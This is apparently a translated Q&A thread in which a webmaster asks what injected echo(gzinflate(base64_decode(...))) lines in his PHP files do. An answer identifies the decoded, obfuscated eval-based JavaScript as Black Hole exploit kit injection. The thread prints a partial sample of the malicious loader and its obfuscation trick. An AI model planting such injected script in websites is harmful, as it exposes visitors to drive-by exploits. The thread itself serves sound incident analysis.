Question

我在各种.php文件中发现了几个echo(gzinflate(base64_decode(".....")，我很好奇它到底是做什么的。我想我设法使用base64 -d < fileetje.b64 > fileetje.gz解码引号中的文本，其中fileetje.b64包含字符串数据。但是当我随后尝试用gunzip压缩fileetje.gz时，它会报告错误的数据。另外，在file fileetje.gz执行data时，我希望GZIP的数据类似。

如何解密Linux命令行中的数据？

像http://www.base64online.com/这样的在线解码器也无法理解代码。将字符串数据添加到问题中是否安全？

UPDATE ：我改进了一个PHP脚本，因为它只是一个简单的回声（Thnx：glglgl）。这就是出现的结果：

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............

结束于：

...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>

Answer 1

嵌入式javascript遵循Black Hole Exploit工具包的格式。它会注入一个iFrame，引导您进行攻击并且可能是坏消息。认为echo()（如评论中所述）将是安全的是不正确的。该功能只是将嵌入的恶意软件代码放入您的页面中以造成损害。

相关SO帖子： My wordpress site was hacked, anyone tell what this code does?

SO发布如何运作：What is the purpose of this JavaScript hack?

相关信息：

http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/

http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/

webapp被黑了，但插入的确切代码是什么？回波（gzinflate（BASE64_DECODE（ “.....”）

1 个答案: